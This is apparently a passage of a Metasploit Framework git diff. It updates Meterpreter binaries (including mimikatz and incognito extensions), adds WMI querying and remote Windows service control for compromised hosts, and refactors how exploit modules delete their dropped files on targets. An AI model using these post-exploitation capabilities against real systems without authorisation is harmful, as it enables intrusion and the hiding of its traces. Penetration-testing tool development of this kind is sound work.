diff --git a/data/meterpreter/common.lib b/data/meterpreter/common.lib index 75b5eb755b..dc6eda3974 100755 Binary files a/data/meterpreter/common.lib and b/data/meterpreter/common.lib differ diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll index 5d97d4617f..5704ed065d 100755 Binary files a/data/meterpreter/elevator.x64.dll and b/data/meterpreter/elevator.x64.dll differ diff --git a/data/meterpreter/elevator.x86.dll b/data/meterpreter/elevator.x86.dll index 59b71b8b00..5162e25b34 100755 Binary files a/data/meterpreter/elevator.x86.dll and b/data/meterpreter/elevator.x86.dll differ diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll index 2c4f278a4b..c3297a20ac 100755 Binary files a/data/meterpreter/ext_server_espia.x64.dll and b/data/meterpreter/ext_server_espia.x64.dll differ diff --git a/data/meterpreter/ext_server_espia.x86.dll b/data/meterpreter/ext_server_espia.x86.dll index 34e6757142..9f4938354a 100755 Binary files a/data/meterpreter/ext_server_espia.x86.dll and b/data/meterpreter/ext_server_espia.x86.dll differ diff --git a/data/meterpreter/ext_server_extapi.x64.dll b/data/meterpreter/ext_server_extapi.x64.dll index 4e3d4728e5..485311ec94 100755 Binary files a/data/meterpreter/ext_server_extapi.x64.dll and b/data/meterpreter/ext_server_extapi.x64.dll differ diff --git a/data/meterpreter/ext_server_extapi.x86.dll b/data/meterpreter/ext_server_extapi.x86.dll index e297c627c2..985a510475 100755 Binary files a/data/meterpreter/ext_server_extapi.x86.dll and b/data/meterpreter/ext_server_extapi.x86.dll differ diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll index 278e6dd39e..faed750330 100755 Binary files a/data/meterpreter/ext_server_incognito.x64.dll and b/data/meterpreter/ext_server_incognito.x64.dll differ diff --git a/data/meterpreter/ext_server_incognito.x86.dll b/data/meterpreter/ext_server_incognito.x86.dll index 732977bfae..98198341b3 100755 Binary files a/data/meterpreter/ext_server_incognito.x86.dll and b/data/meterpreter/ext_server_incognito.x86.dll differ diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll b/data/meterpreter/ext_server_lanattacks.x64.dll index f45475fd86..294ef2261a 100755 Binary files a/data/meterpreter/ext_server_lanattacks.x64.dll and b/data/meterpreter/ext_server_lanattacks.x64.dll differ diff --git a/data/meterpreter/ext_server_lanattacks.x86.dll b/data/meterpreter/ext_server_lanattacks.x86.dll index 03bebdfe1e..ef92743241 100755 Binary files a/data/meterpreter/ext_server_lanattacks.x86.dll and b/data/meterpreter/ext_server_lanattacks.x86.dll differ diff --git a/data/meterpreter/ext_server_mimikatz.x64.dll b/data/meterpreter/ext_server_mimikatz.x64.dll index 1ce9f75e8c..2d10147d47 100755 Binary files a/data/meterpreter/ext_server_mimikatz.x64.dll and b/data/meterpreter/ext_server_mimikatz.x64.dll differ diff --git a/data/meterpreter/ext_server_mimikatz.x86.dll b/data/meterpreter/ext_server_mimikatz.x86.dll index 4bdc358efe..88df3a70e3 100755 Binary files a/data/meterpreter/ext_server_mimikatz.x86.dll and b/data/meterpreter/ext_server_mimikatz.x86.dll differ diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll index 2a69f8e02a..f13693d08b 100755 Binary files a/data/meterpreter/ext_server_priv.x64.dll and b/data/meterpreter/ext_server_priv.x64.dll differ diff --git a/data/meterpreter/ext_server_priv.x86.dll b/data/meterpreter/ext_server_priv.x86.dll index d16d2f4280..0e61427ac4 100755 Binary files a/data/meterpreter/ext_server_priv.x86.dll and b/data/meterpreter/ext_server_priv.x86.dll differ diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll index 45845edb63..8c96c6c836 100755 Binary files a/data/meterpreter/ext_server_stdapi.x64.dll and b/data/meterpreter/ext_server_stdapi.x64.dll differ diff --git a/data/meterpreter/ext_server_stdapi.x86.dll b/data/meterpreter/ext_server_stdapi.x86.dll index 9f21e8379b..ed5983658d 100755 Binary files a/data/meterpreter/ext_server_stdapi.x86.dll and b/data/meterpreter/ext_server_stdapi.x86.dll differ diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll index 6dddf1056a..b80d35d745 100755 Binary files a/data/meterpreter/metsrv.x64.dll and b/data/meterpreter/metsrv.x64.dll differ diff --git a/data/meterpreter/metsrv.x86.dll b/data/meterpreter/metsrv.x86.dll index e5c7373f56..15efbb9495 100755 Binary files a/data/meterpreter/metsrv.x86.dll and b/data/meterpreter/metsrv.x86.dll differ diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll index 91f123da9c..7eb1f3f307 100755 Binary files a/data/meterpreter/screenshot.x64.dll and b/data/meterpreter/screenshot.x64.dll differ diff --git a/data/meterpreter/screenshot.x86.dll b/data/meterpreter/screenshot.x86.dll index c35ccb08bf..3699d2ae0c 100755 Binary files a/data/meterpreter/screenshot.x86.dll and b/data/meterpreter/screenshot.x86.dll differ diff --git a/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb b/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb index 82a58b8361..609f2ab5e4 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb @@ -134,14 +134,16 @@ private result[ts]['Text'] = t.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT) end - response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) do |f| - ts = f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP) + response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES) do |fs| + ts = fs.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP) result[ts] ||= {} result[ts]['Files'] ||= [] - result[ts]['Files'] << { - :name => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME), - :size => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE) - } + fs.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) do |f| + result[ts]['Files'] << { + :name => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME), + :size => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE) + } + end end response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG) do |jpg| diff --git a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb index 08408e3489..31a3cd45af 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb @@ -5,6 +5,7 @@ require 'rex/post/meterpreter/extensions/extapi/window/window' require 'rex/post/meterpreter/extensions/extapi/service/service' require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard' require 'rex/post/meterpreter/extensions/extapi/adsi/adsi' +require 'rex/post/meterpreter/extensions/extapi/wmi/wmi' module Rex module Post @@ -29,10 +30,11 @@ class Extapi < Extension 'name' => 'extapi', 'ext' => ObjectAliases.new( { - 'window' => Rex::Post::Meterpreter::Extensions::Extapi::Window::Window.new(client), - 'service' => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client), + 'window' => Rex::Post::Meterpreter::Extensions::Extapi::Window::Window.new(client), + 'service' => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client), 'clipboard' => Rex::Post::Meterpreter::Extensions::Extapi::Clipboard::Clipboard.new(client), - 'adsi' => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client) + 'adsi' => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client), + 'wmi' => Rex::Post::Meterpreter::Extensions::Extapi::Wmi::Wmi.new(client) }) }, ]) diff --git a/lib/rex/post/meterpreter/extensions/extapi/service/service.rb b/lib/rex/post/meterpreter/extensions/extapi/service/service.rb index 86fbc7d148..0318c1aeac 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/service/service.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/service/service.rb @@ -15,18 +15,26 @@ module Service ### class Service + SERVICE_OP_START = 1 + SERVICE_OP_PAUSE = 2 + SERVICE_OP_RESUME = 3 + SERVICE_OP_STOP = 4 + SERVICE_OP_RESTART = 5 + def initialize(client) @client = client end + # # Enumerate all the services on the target. + # def enumerate request = Packet.create_request('extapi_service_enum') response = client.send_request(request) services = [] - response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) { |s| + response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) do |s| services << { :name => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_NAME), :display => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME), @@ -34,29 +42,59 @@ class Service :status => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_STATUS), :interactive => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE) } - } + end - return services.sort_by { |s| s[:name].upcase } + services.sort_by { |s| s[:name].upcase } end + # # Query some detailed parameters about a particular service. + # def query(service_name) request = Packet.create_request('extapi_service_query') request.add_tlv(TLV_TYPE_EXT_SERVICE_ENUM_NAME, service_name) response = client.send_request(request) - detail = { + { :starttype => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE), :display => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME), :startname => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME), :path => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_PATH), :logroup => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP), :interactive => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE), - :dacl => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL) + :dacl => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL), + :status => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STATUS) } + end - return detail + # + # Control a single service + # + def control(service_name, op) + if op.is_a? String + case op.strip.downcase + when "start" + op = SERVICE_OP_START + when "pause" + op = SERVICE_OP_PAUSE + when "resume" + op = SERVICE_OP_RESUME + when "stop" + op = SERVICE_OP_STOP + when "restart" + op = SERVICE_OP_RESTART + end + end + + unless (op.is_a? Integer) && op >= SERVICE_OP_START && op <= SERVICE_OP_RESTART + raise ArgumentError, "Invalid operation: #{op}" + end + + request = Packet.create_request('extapi_service_control') + request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_NAME, service_name) + request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_OP, op) + client.send_request(request) end attr_accessor :client diff --git a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb index d7a2fff3ec..55ad544dc1 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb @@ -27,6 +27,10 @@ TLV_TYPE_EXT_SERVICE_QUERY_PATH = TLV_META_TYPE_STRING | (TLV_TYPE_E TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 24) TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 25) TLV_TYPE_EXT_SERVICE_QUERY_DACL = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 26) +TLV_TYPE_EXT_SERVICE_QUERY_STATUS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 27) + +TLV_TYPE_EXT_SERVICE_CTRL_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 28) +TLV_TYPE_EXT_SERVICE_CTRL_OP = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 29) TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 35) @@ -38,6 +42,7 @@ TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT = TLV_META_TYPE_STRING | (TLV_TYPE_E TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 41) TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 42) TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE = TLV_META_TYPE_QWORD | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 43) +TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 44) TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 45) TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 46) @@ -57,6 +62,14 @@ TLV_TYPE_EXT_ADSI_RESULT = TLV_META_TYPE_GROUP | (TLV_TYPE_E TLV_TYPE_EXT_ADSI_MAXRESULTS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 60) TLV_TYPE_EXT_ADSI_PAGESIZE = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 61) +TLV_TYPE_EXT_WMI_DOMAIN = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 65) +TLV_TYPE_EXT_WMI_QUERY = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 66) +TLV_TYPE_EXT_WMI_FIELD = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 67) +TLV_TYPE_EXT_WMI_VALUE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 68) +TLV_TYPE_EXT_WMI_FIELDS = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 69) +TLV_TYPE_EXT_WMI_VALUES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 70) +TLV_TYPE_EXT_WMI_ERROR = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 71) + end end end diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb new file mode 100644 index 0000000000..c6351318bd --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb @@ -0,0 +1,75 @@ +# -*- coding: binary -*- + +module Rex +module Post +module Meterpreter +module Extensions +module Extapi +module Wmi + +### +# +# This meterpreter extension contains extended API functions for +# performing WMI queries. +# +### +class Wmi + + def initialize(client) + @client = client + end + + # + # Perform a generic wmi query against the target machine. + # + # @param query [String] The WMI query string. + # @param root [String] Specify root to target, otherwise defaults + # to 'root\cimv2' + # + # @returns [Hash] Array of field names with associated values. + # + def query(query, root = nil) + request = Packet.create_request('extapi_wmi_query') + + request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.blank? + request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query) + + response = client.send_request(request) + + # Bomb out with the right error messa + error_msg = response.get_tlv_value(TLV_TYPE_EXT_WMI_ERROR) + raise error_msg if error_msg + + fields = [] + fields_tlv = response.get_tlv(TLV_TYPE_EXT_WMI_FIELDS) + + # If we didn't get any fields back, then we didn't get any results. + # The reason is because without results, we don't know which fields + # were requested in the first place + return nil unless fields_tlv + + fields_tlv.each(TLV_TYPE_EXT_WMI_FIELD) { |f| + fields << f.value + } + + values = [] + response.each(TLV_TYPE_EXT_WMI_VALUES) { |r| + value = [] + r.each(TLV_TYPE_EXT_WMI_VALUE) { |v| + value << v.value + } + values << value + } + + return { + :fields => fields, + :values => values + } + end + + attr_accessor :client + +end + +end; end; end; end; end; end + diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb index 40df85f5f8..326c837d3f 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb @@ -17,6 +17,7 @@ class Console::CommandDispatcher::Extapi require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/service' require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard' require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi' + require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi' Klass = Console::CommandDispatcher::Extapi @@ -25,7 +26,8 @@ class Console::CommandDispatcher::Extapi Klass::Window, Klass::Service, Klass::Clipboard, - Klass::Adsi + Klass::Adsi, + Klass::Wmi ] include Console::CommandDispatcher diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb index 7896e10a3a..5b0895fb2c 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb @@ -22,8 +22,9 @@ class Console::CommandDispatcher::Extapi::Service # def commands { - "service_enum" => "Enumerate all registered Windows services", - "service_query" => "Query more detail about a specific Windows service" + "service_enum" => "Enumerate all registered Windows services", + "service_query" => "Query more detail about a specific Windows service", + "service_control" => "Control a single service (start/pause/resume/stop/restart)" } end @@ -33,6 +34,32 @@ class Console::CommandDispatcher::Extapi::Service def name "Extapi: Service Management" end + + # + # Initialize the instance + # + def initialize(shell) + super + + @status_map = { + 1 => "Stopped", + 2 => "Starting", + 3 => "Stopping", + 4 => "Running", + 5 => "Continuing", + 6 => "Pausing", + 7 => "Paused" + } + + @start_type_map = { + 0 => "Boot", + 1 => "System", + 2 => "Automatic", + 3 => "Manual", + 4 => "Disabled" + } + end + # # Options for the service_enum command. # @@ -44,7 +71,7 @@ class Console::CommandDispatcher::Extapi::Service # Query a single service for more detail. # def cmd_service_enum(*args) - @@service_enum_opts.parse(args) { |opt, idx, val| + @@service_enum_opts.parse(args) do |opt, idx, val| case opt when "-h" print( @@ -55,17 +82,7 @@ class Console::CommandDispatcher::Extapi::Service "able to interact with the desktop.\n\n") return true end - } - - status_map = { - 1 => "Stopped", - 2 => "Starting", - 3 => "Stopping", - 4 => "Running", - 5 => "Continuing", - 6 => "Pausing", - 7 => "Paused" - } + end services = client.extapi.service.enumerate @@ -78,14 +95,14 @@ class Console::CommandDispatcher::Extapi::Service ] ) - services.each { |s| + services.each do |s| table << [ s[:pid], - status_map[s[:status]], + @status_map[s[:status]], s[:interactive] ? "Y" : "N", "#{s[:name].downcase} (#{s[:display]})" ] - } + end print_line print_line(table.to_s) @@ -107,9 +124,9 @@ class Console::CommandDispatcher::Extapi::Service # Query a single service for more detail. # def cmd_service_query(*args) - args << "-h" if args.length == 0 + args.unshift("-h") if args.length != 1 - @@service_query_opts.parse(args) { |opt, idx, val| + @@service_query_opts.parse(args) do |opt, idx, val| case opt when "-h" print( @@ -119,25 +136,18 @@ class Console::CommandDispatcher::Extapi::Service "binary path, DACL, load order group, start type and more.\n\n") return true end - } + end service_name = args.shift - start_type_map = { - 0 => "Boot", - 1 => "System", - 2 => "Automatic", - 3 => "Manual", - 4 => "Disabled" - } - detail = client.extapi.service.query(service_name) print_line print_line("Name : #{service_name}") print_line("Display : #{detail[:display]}") print_line("Account : #{detail[:startname]}") - print_line("Start Type : #{start_type_map[detail[:starttype]]}") + print_line("Status : #{@status_map[detail[:status]]}") + print_line("Start Type : #{@start_type_map[detail[:starttype]]}") print_line("Path : #{detail[:path]}") print_line("L.O. Group : #{detail[:logroup]}") print_line("Interactive : #{detail[:interactive] ? "Yes" : "No"}") @@ -146,6 +156,39 @@ class Console::CommandDispatcher::Extapi::Service end + # + # Options for the service_control command. + # + @@service_control_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help banner" ] + ) + + # + # Query a single service for more detail. + # + def cmd_service_control(*args) + args.unshift("-h") if args.length != 2 + + @@service_control_opts.parse(args) do |opt, idx, val| + case opt + when "-h" + print( + "\nUsage: service_control [-h] \n" + + " : The name of the service to control.\n" + + " : The operation to perform on the service.\n" + + " Valid ops: start pause resume stop restart.\n\n") + return true + end + end + + service_name = args[0] + op = args[1] + + client.extapi.service.control(service_name, op) + + print_good("Operation #{op} succeeded.") + end + end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb new file mode 100644 index 0000000000..d4670fb42b --- /dev/null +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb @@ -0,0 +1,108 @@ +# -*- coding: binary -*- +require 'rex/post/meterpreter' + +module Rex +module Post +module Meterpreter +module Ui + +### +# +# Extended API WMI Querying interface. +# +### +class Console::CommandDispatcher::Extapi::Wmi + + Klass = Console::CommandDispatcher::Extapi::Wmi + + include Console::CommandDispatcher + + # Zero indicates "no limit" + DEFAULT_MAX_RESULTS = 0 + DEFAULT_PAGE_SIZE = 0 + + # + # List of supported commands. + # + def commands + { + "wmi_query" => "Perform a generic WMI query and return the results" + } + end + + # + # Name for this dispatcher + # + def name + "Extapi: WMI Querying" + end + + # + # Options for the wmi_query command. + # + @@wmi_query_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help banner" ], + "-r" => [ true, "Specify a different root object (defaults to 'root\\CIMV2')" ] + ) + + def wmi_query_usage + print( + "\nUsage: wmi_query [-r root]\n\n" + + "Query the target and display the results.\n\n" + + @@wmi_query_opts.usage) + end + + # + # Enumerate WMI objects. + # + def cmd_wmi_query(*args) + args.unshift("-h") if args.length < 1 + + root = nil + + @@wmi_query_opts.parse(args) { |opt, idx, val| + case opt + when "-r" + root = val + when "-h" + wmi_query_usage + return true + end + } + + query = args.shift + + objects = client.extapi.wmi.query(query, root) + + if objects + table = Rex::Ui::Text::Table.new( + 'Header' => query, + 'Indent' => 0, + 'SortIndex' => 0, + 'Columns' => objects[:fields] + ) + + objects[:values].each do |c| + table << c + end + + print_line + print_line(table.to_s) + + print_line("Total objects: #{objects[:values].length}") + else + print_status("The WMI query yielded no results.") + end + + print_line + + return true + end + +end + +end +end +end +end + diff --git a/modules/exploits/multi/http/struts_default_action_mapper.rb b/modules/exploits/multi/http/struts_default_action_mapper.rb index 709cbaabe0..c10c682eb4 100644 --- a/modules/exploits/multi/http/struts_default_action_mapper.rb +++ b/modules/exploits/multi/http/struts_default_action_mapper.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote win_file = file.gsub("/", "\\\\") if session.type == "meterpreter" begin - wintemp = session.fs.file.expand_path("%TEMP%") + wintemp = session.sys.config.getenv('TEMP') win_file = "#{wintemp}\\#{win_file}" session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) session.fs.file.rm(win_file) diff --git a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb index b45c11bdb7..626da8d3a4 100644 --- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb +++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb @@ -68,13 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(session) if session.type == "meterpreter" session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") - end - @dropped_files.delete_if do |file| - win_file = file.gsub("/", "\\\\") - if session.type == "meterpreter" + @dropped_files.delete_if do |file| + win_file = file.gsub("/", "\\\\") begin - wintemp = session.fs.file.expand_path("%TEMP%") + wintemp = session.sys.config.getenv('TEMP') win_file = "#{wintemp}\\#{win_file}" session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) session.fs.file.rm(win_file) @@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Failed to delete #{win_file}") false end - end end end diff --git a/modules/exploits/windows/browser/honeywell_tema_exec.rb b/modules/exploits/windows/browser/honeywell_tema_exec.rb index 6ffb606ea9..7138d2004d 100644 --- a/modules/exploits/windows/browser/honeywell_tema_exec.rb +++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb @@ -74,13 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(session) if session.type == "meterpreter" session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") - end - @dropped_files.each do |file| - win_file = file.gsub("/", "\\\\") - if session.type == "meterpreter" + @dropped_files.each do |file| + win_file = file.gsub("/", "\\\\") begin - wintemp = session.fs.file.expand_path("%WINDIR%") + wintemp = session.sys.config.getenv('WINDIR') win_file = "#{wintemp}\\Temp\\#{win_file}" # Meterpreter should do this automatically as part of # fs.file.rm(). Until that has been implemented, remove the @@ -93,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Failed to delete #{win_file}") false end - end end @@ -169,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end \ No newline at end of file +end diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb index a32c3f9348..474efd2f79 100644 --- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb +++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb @@ -72,13 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(session) if session.type == "meterpreter" session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") - end - @dropped_files.delete_if do |file| - win_file = file.gsub("/", "\\\\") - if session.type == "meterpreter" + @dropped_files.delete_if do |file| + win_file = file.gsub("/", "\\\\") begin - wintemp = session.fs.file.expand_path("%TEMP%") + wintemp = session.sys.config.getenv('TEMP') win_file = "#{wintemp}\\#{win_file}" # Meterpreter should do this automatically as part of # fs.file.rm(). Until that has been implemented, remove the @@ -91,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Failed to delete #{win_file}") false end - end end @@ -184,4 +181,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end \ No newline at end of file +end diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb index b1618c0aaf..55be42c401 100644 --- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb +++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb @@ -66,13 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(session) if session.type == "meterpreter" session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") - end - @dropped_files.delete_if do |file| - win_file = file.gsub("/", "\\\\") - if session.type == "meterpreter" + @dropped_files.delete_if do |file| + win_file = file.gsub("/", "\\\\") begin - wintemp = session.fs.file.expand_path("%TEMP%") + wintemp = session.sys.config.getenv('TEMP') win_file = "#{wintemp}\\#{win_file}" session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) session.fs.file.rm(win_file) @@ -82,7 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Failed to delete #{win_file}") false end - end end end @@ -257,4 +254,4 @@ This code allows to launch other executables with user data provided as argument solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so the target should have the WebClient service enabled, which is only enabled by default on XP SP3. -=end \ No newline at end of file +=end diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index 45dbf51476..bc072cbaa6 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote # Use the system path for executable to run except the wordpad if client.sys.config.sysinfo["OS"] =~ /Windows XP/ - windir = client.fs.file.expand_path("%ProgramFiles%") + windir = client.sys.config.getenv('ProgramFiles') cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe" else # Windows 2000 cmd = "notepad.exe" diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb index 5bc2afeae6..afc65e9246 100644 --- a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb +++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local # Usint this solution atm because I'm experiencing 